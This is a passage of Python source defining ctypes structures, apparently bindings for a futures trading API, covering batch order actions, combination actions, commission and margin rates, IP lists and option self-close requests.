if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if InvestorRange:
self.InvestorRange = InvestorRange.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if Offset:
self.Offset = Offset
if OffsetType:
self.OffsetType = OffsetType.encode("GBK")
class QryStrikeOffset(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
class InputBatchOrderAction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("OrderActionRef", c_int),
("RequestID", c_int),
("FrontID", c_int),
("SessionID", c_int),
("ExchangeID", c_char_Array_9),
("UserID", c_char_Array_16),
("InvestUnitID", c_char_Array_17),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, BrokerID=None, InvestorID=None, OrderActionRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, UserID=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if OrderActionRef:
self.OrderActionRef = OrderActionRef
if RequestID:
self.RequestID = RequestID
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class BatchOrderAction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("OrderActionRef", c_int),
("RequestID", c_int),
("FrontID", c_int),
("SessionID", c_int),
("ExchangeID", c_char_Array_9),
("ActionDate", c_char_Array_9),
("ActionTime", c_char_Array_9),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("ActionLocalID", c_char_Array_13),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("BusinessUnit", c_char_Array_21),
("OrderActionStatus", c_char),
("UserID", c_char_Array_16),
("StatusMsg", c_char_Array_81),
("InvestUnitID", c_char_Array_17),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, BrokerID=None, InvestorID=None, OrderActionRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, ActionDate=None, ActionTime=None, TraderID=None, InstallID=None, ActionLocalID=None, ParticipantID=None, ClientID=None, BusinessUnit=None, OrderActionStatus=None, UserID=None, StatusMsg=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if OrderActionRef:
self.OrderActionRef = OrderActionRef
if RequestID:
self.RequestID = RequestID
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ActionDate:
self.ActionDate = ActionDate.encode("GBK")
if ActionTime:
self.ActionTime = ActionTime.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if ActionLocalID:
self.ActionLocalID = ActionLocalID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if OrderActionStatus:
self.OrderActionStatus = OrderActionStatus.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if StatusMsg:
self.StatusMsg = StatusMsg.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class ExchangeBatchOrderAction(Struct):
_fields_ = [
("ExchangeID", c_char_Array_9),
("ActionDate", c_char_Array_9),
("ActionTime", c_char_Array_9),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("ActionLocalID", c_char_Array_13),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("BusinessUnit", c_char_Array_21),
("OrderActionStatus", c_char),
("UserID", c_char_Array_16),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, ExchangeID=None, ActionDate=None, ActionTime=None, TraderID=None, InstallID=None, ActionLocalID=None, ParticipantID=None, ClientID=None, BusinessUnit=None, OrderActionStatus=None, UserID=None, IPAddress=None, MacAddress=None):
super().__init__()
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ActionDate:
self.ActionDate = ActionDate.encode("GBK")
if ActionTime:
self.ActionTime = ActionTime.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if ActionLocalID:
self.ActionLocalID = ActionLocalID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if OrderActionStatus:
self.OrderActionStatus = OrderActionStatus.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class QryBatchOrderAction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("ExchangeID", c_char_Array_9),
]
def __init__(self, BrokerID=None, InvestorID=None, ExchangeID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
class CombInstrumentGuard(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InstrumentID", c_char_Array_31),
("GuarantRatio", c_double),
("ExchangeID", c_char_Array_9),
]
def __init__(self, BrokerID=None, InstrumentID=None, GuarantRatio=None, ExchangeID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if GuarantRatio:
self.GuarantRatio = GuarantRatio
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
class QryCombInstrumentGuard(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InstrumentID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
]
def __init__(self, BrokerID=None, InstrumentID=None, ExchangeID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
class InputCombAction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("CombActionRef", c_char_Array_13),
("UserID", c_char_Array_16),
("Direction", c_char),
("Volume", c_int),
("CombDirection", c_char),
("HedgeFlag", c_char),
("ExchangeID", c_char_Array_9),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, CombActionRef=None, UserID=None, Direction=None, Volume=None, CombDirection=None, HedgeFlag=None, ExchangeID=None, IPAddress=None, MacAddress=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if CombActionRef:
self.CombActionRef = CombActionRef.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if Direction:
self.Direction = Direction.encode("GBK")
if Volume:
self.Volume = Volume
if CombDirection:
self.CombDirection = CombDirection.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class CombAction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("CombActionRef", c_char_Array_13),
("UserID", c_char_Array_16),
("Direction", c_char),
("Volume", c_int),
("CombDirection", c_char),
("HedgeFlag", c_char),
("ActionLocalID", c_char_Array_13),
("ExchangeID", c_char_Array_9),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("ExchangeInstID", c_char_Array_31),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("ActionStatus", c_char),
("NotifySequence", c_int),
("TradingDay", c_char_Array_9),
("SettlementID", c_int),
("SequenceNo", c_int),
("FrontID", c_int),
("SessionID", c_int),
("UserProductInfo", c_char_Array_11),
("StatusMsg", c_char_Array_81),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
("ComTradeID", c_char_Array_21),
("BranchID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, CombActionRef=None, UserID=None, Direction=None, Volume=None, CombDirection=None, HedgeFlag=None, ActionLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, ActionStatus=None, NotifySequence=None, TradingDay=None, SettlementID=None, SequenceNo=None, FrontID=None, SessionID=None, UserProductInfo=None, StatusMsg=None, IPAddress=None, MacAddress=None, ComTradeID=None, BranchID=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if CombActionRef:
self.CombActionRef = CombActionRef.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if Direction:
self.Direction = Direction.encode("GBK")
if Volume:
self.Volume = Volume
if CombDirection:
self.CombDirection = CombDirection.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if ActionLocalID:
self.ActionLocalID = ActionLocalID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if ActionStatus:
self.ActionStatus = ActionStatus.encode("GBK")
if NotifySequence:
self.NotifySequence = NotifySequence
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if SettlementID:
self.SettlementID = SettlementID
if SequenceNo:
self.SequenceNo = SequenceNo
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if UserProductInfo:
self.UserProductInfo = UserProductInfo.encode("GBK")
if StatusMsg:
self.StatusMsg = StatusMsg.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
if ComTradeID:
self.ComTradeID = ComTradeID.encode("GBK")
if BranchID:
self.BranchID = BranchID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class QryCombAction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class ExchangeCombAction(Struct):
_fields_ = [
("Direction", c_char),
("Volume", c_int),
("CombDirection", c_char),
("HedgeFlag", c_char),
("ActionLocalID", c_char_Array_13),
("ExchangeID", c_char_Array_9),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("ExchangeInstID", c_char_Array_31),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("ActionStatus", c_char),
("NotifySequence", c_int),
("TradingDay", c_char_Array_9),
("SettlementID", c_int),
("SequenceNo", c_int),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
("ComTradeID", c_char_Array_21),
("BranchID", c_char_Array_9),
]
def __init__(self, Direction=None, Volume=None, CombDirection=None, HedgeFlag=None, ActionLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, ActionStatus=None, NotifySequence=None, TradingDay=None, SettlementID=None, SequenceNo=None, IPAddress=None, MacAddress=None, ComTradeID=None, BranchID=None):
super().__init__()
if Direction:
self.Direction = Direction.encode("GBK")
if Volume:
self.Volume = Volume
if CombDirection:
self.CombDirection = CombDirection.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if ActionLocalID:
self.ActionLocalID = ActionLocalID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if ActionStatus:
self.ActionStatus = ActionStatus.encode("GBK")
if NotifySequence:
self.NotifySequence = NotifySequence
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if SettlementID:
self.SettlementID = SettlementID
if SequenceNo:
self.SequenceNo = SequenceNo
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
if ComTradeID:
self.ComTradeID = ComTradeID.encode("GBK")
if BranchID:
self.BranchID = BranchID.encode("GBK")
class QryExchangeCombAction(Struct):
_fields_ = [
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("ExchangeInstID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("TraderID", c_char_Array_21),
]
def __init__(self, ParticipantID=None, ClientID=None, ExchangeInstID=None, ExchangeID=None, TraderID=None):
super().__init__()
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
class ProductExchRate(Struct):
_fields_ = [
("ProductID", c_char_Array_31),
("QuoteCurrencyID", c_char_Array_4),
("ExchangeRate", c_double),
("ExchangeID", c_char_Array_9),
]
def __init__(self, ProductID=None, QuoteCurrencyID=None, ExchangeRate=None, ExchangeID=None):
super().__init__()
if ProductID:
self.ProductID = ProductID.encode("GBK")
if QuoteCurrencyID:
self.QuoteCurrencyID = QuoteCurrencyID.encode("GBK")
if ExchangeRate:
self.ExchangeRate = ExchangeRate
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
class QryProductExchRate(Struct):
_fields_ = [
("ProductID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
]
def __init__(self, ProductID=None, ExchangeID=None):
super().__init__()
if ProductID:
self.ProductID = ProductID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
class QryForQuoteParam(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InstrumentID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
]
def __init__(self, BrokerID=None, InstrumentID=None, ExchangeID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
class ForQuoteParam(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InstrumentID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("LastPrice", c_double),
("PriceInterval", c_double),
]
def __init__(self, BrokerID=None, InstrumentID=None, ExchangeID=None, LastPrice=None, PriceInterval=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if LastPrice:
self.LastPrice = LastPrice
if PriceInterval:
self.PriceInterval = PriceInterval
class MMOptionInstrCommRate(Struct):
_fields_ = [
("InstrumentID", c_char_Array_31),
("InvestorRange", c_char),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("OpenRatioByMoney", c_double),
("OpenRatioByVolume", c_double),
("CloseRatioByMoney", c_double),
("CloseRatioByVolume", c_double),
("CloseTodayRatioByMoney", c_double),
("CloseTodayRatioByVolume", c_double),
("StrikeRatioByMoney", c_double),
("StrikeRatioByVolume", c_double),
]
def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, OpenRatioByMoney=None, OpenRatioByVolume=None, CloseRatioByMoney=None, CloseRatioByVolume=None, CloseTodayRatioByMoney=None, CloseTodayRatioByVolume=None, StrikeRatioByMoney=None, StrikeRatioByVolume=None):
super().__init__()
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if InvestorRange:
self.InvestorRange = InvestorRange.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if OpenRatioByMoney:
self.OpenRatioByMoney = OpenRatioByMoney
if OpenRatioByVolume:
self.OpenRatioByVolume = OpenRatioByVolume
if CloseRatioByMoney:
self.CloseRatioByMoney = CloseRatioByMoney
if CloseRatioByVolume:
self.CloseRatioByVolume = CloseRatioByVolume
if CloseTodayRatioByMoney:
self.CloseTodayRatioByMoney = CloseTodayRatioByMoney
if CloseTodayRatioByVolume:
self.CloseTodayRatioByVolume = CloseTodayRatioByVolume
if StrikeRatioByMoney:
self.StrikeRatioByMoney = StrikeRatioByMoney
if StrikeRatioByVolume:
self.StrikeRatioByVolume = StrikeRatioByVolume
class QryMMOptionInstrCommRate(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
class MMInstrumentCommissionRate(Struct):
_fields_ = [
("InstrumentID", c_char_Array_31),
("InvestorRange", c_char),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("OpenRatioByMoney", c_double),
("OpenRatioByVolume", c_double),
("CloseRatioByMoney", c_double),
("CloseRatioByVolume", c_double),
("CloseTodayRatioByMoney", c_double),
("CloseTodayRatioByVolume", c_double),
]
def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, OpenRatioByMoney=None, OpenRatioByVolume=None, CloseRatioByMoney=None, CloseRatioByVolume=None, CloseTodayRatioByMoney=None, CloseTodayRatioByVolume=None):
super().__init__()
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if InvestorRange:
self.InvestorRange = InvestorRange.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if OpenRatioByMoney:
self.OpenRatioByMoney = OpenRatioByMoney
if OpenRatioByVolume:
self.OpenRatioByVolume = OpenRatioByVolume
if CloseRatioByMoney:
self.CloseRatioByMoney = CloseRatioByMoney
if CloseRatioByVolume:
self.CloseRatioByVolume = CloseRatioByVolume
if CloseTodayRatioByMoney:
self.CloseTodayRatioByMoney = CloseTodayRatioByMoney
if CloseTodayRatioByVolume:
self.CloseTodayRatioByVolume = CloseTodayRatioByVolume
class QryMMInstrumentCommissionRate(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
class InstrumentOrderCommRate(Struct):
_fields_ = [
("InstrumentID", c_char_Array_31),
("InvestorRange", c_char),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("HedgeFlag", c_char),
("OrderCommByVolume", c_double),
("OrderActionCommByVolume", c_double),
("ExchangeID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, HedgeFlag=None, OrderCommByVolume=None, OrderActionCommByVolume=None, ExchangeID=None, InvestUnitID=None):
super().__init__()
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if InvestorRange:
self.InvestorRange = InvestorRange.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if OrderCommByVolume:
self.OrderCommByVolume = OrderCommByVolume
if OrderActionCommByVolume:
self.OrderActionCommByVolume = OrderActionCommByVolume
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class QryInstrumentOrderCommRate(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
class TradeParam(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("TradeParamID", c_char),
("TradeParamValue", c_char_Array_256),
("Memo", c_char_Array_161),
]
def __init__(self, BrokerID=None, TradeParamID=None, TradeParamValue=None, Memo=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if TradeParamID:
self.TradeParamID = TradeParamID.encode("GBK")
if TradeParamValue:
self.TradeParamValue = TradeParamValue.encode("GBK")
if Memo:
self.Memo = Memo.encode("GBK")
class InstrumentMarginRateUL(Struct):
_fields_ = [
("InstrumentID", c_char_Array_31),
("InvestorRange", c_char),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("HedgeFlag", c_char),
("LongMarginRatioByMoney", c_double),
("LongMarginRatioByVolume", c_double),
("ShortMarginRatioByMoney", c_double),
("ShortMarginRatioByVolume", c_double),
]
def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, HedgeFlag=None, LongMarginRatioByMoney=None, LongMarginRatioByVolume=None, ShortMarginRatioByMoney=None, ShortMarginRatioByVolume=None):
super().__init__()
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if InvestorRange:
self.InvestorRange = InvestorRange.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if LongMarginRatioByMoney:
self.LongMarginRatioByMoney = LongMarginRatioByMoney
if LongMarginRatioByVolume:
self.LongMarginRatioByVolume = LongMarginRatioByVolume
if ShortMarginRatioByMoney:
self.ShortMarginRatioByMoney = ShortMarginRatioByMoney
if ShortMarginRatioByVolume:
self.ShortMarginRatioByVolume = ShortMarginRatioByVolume
class FutureLimitPosiParam(Struct):
_fields_ = [
("InvestorRange", c_char),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("ProductID", c_char_Array_31),
("SpecOpenVolume", c_int),
("ArbiOpenVolume", c_int),
("OpenVolume", c_int),
]
def __init__(self, InvestorRange=None, BrokerID=None, InvestorID=None, ProductID=None, SpecOpenVolume=None, ArbiOpenVolume=None, OpenVolume=None):
super().__init__()
if InvestorRange:
self.InvestorRange = InvestorRange.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if ProductID:
self.ProductID = ProductID.encode("GBK")
if SpecOpenVolume:
self.SpecOpenVolume = SpecOpenVolume
if ArbiOpenVolume:
self.ArbiOpenVolume = ArbiOpenVolume
if OpenVolume:
self.OpenVolume = OpenVolume
class LoginForbiddenIP(Struct):
_fields_ = [
("IPAddress", c_char_Array_16),
]
def __init__(self, IPAddress=None):
super().__init__()
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
class IPList(Struct):
_fields_ = [
("IPAddress", c_char_Array_16),
("IsWhite", c_int),
]
def __init__(self, IPAddress=None, IsWhite=None):
super().__init__()
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if IsWhite:
self.IsWhite = IsWhite
class InputOptionSelfClose(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("OptionSelfCloseRef", c_char_Array_13),
("UserID", c_char_Array_16),
("Volume", c_int),
("RequestID", c_int),
("BusinessUnit", c_char_Array_21),
("HedgeFlag", c_char),
("OptSelfCloseFlag", c_char),
("ExchangeID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
("AccountID", c_char_Array_13),
("CurrencyID", c_char_Array_4),
("ClientID", c_char_Array_11),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, OptionSelfCloseRef=None, UserID=None, Volume=None, RequestID=None, BusinessUnit=None, HedgeFlag=None, OptSelfCloseFlag=None, ExchangeID=None, InvestUnitID=None, AccountID=None, CurrencyID=None, ClientID=None, IPAddress=None, MacAddress=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if OptionSelfCloseRef:
self.OptionSelfCloseRef = OptionSelfCloseRef.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if Volume:
self.Volume = Volume
if RequestID:
self.RequestID = RequestID
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if OptSelfCloseFlag:
self.OptSelfCloseFlag = OptSelfCloseFlag.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class InputOptionSelfCloseAction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("OptionSelfCloseActionRef", c_int),
("OptionSelfCloseRef", c_char_Array_13),
("RequestID", c_int),
("FrontID", c_int),
("SessionID", c_int),
("ExchangeID", c_char_Array_9),
("OptionSelfCloseSysID", c_char_Array_21),
("ActionFlag", c_char),
("UserID", c_char_Array_16),
("InstrumentID", c_char_Array_31),
("InvestUnitID", c_char_Array_17),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, BrokerID=None, InvestorID=None, OptionSelfCloseActionRef=None, OptionSelfCloseRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, OptionSelfCloseSysID=None, ActionFlag=None, UserID=None, InstrumentID=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if OptionSelfCloseActionRef:
self.OptionSelfCloseActionRef = OptionSelfCloseActionRef
if OptionSelfCloseRef:
self.OptionSelfCloseRef = OptionSelfCloseRef.encode("GBK")
if RequestID:
self.RequestID = RequestID
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if OptionSelfCloseSysID:
self.OptionSelfCloseSysID = OptionSelfCloseSysID.encode("GBK")
if ActionFlag:
self.ActionFlag = ActionFlag.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class OptionSelfClose(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
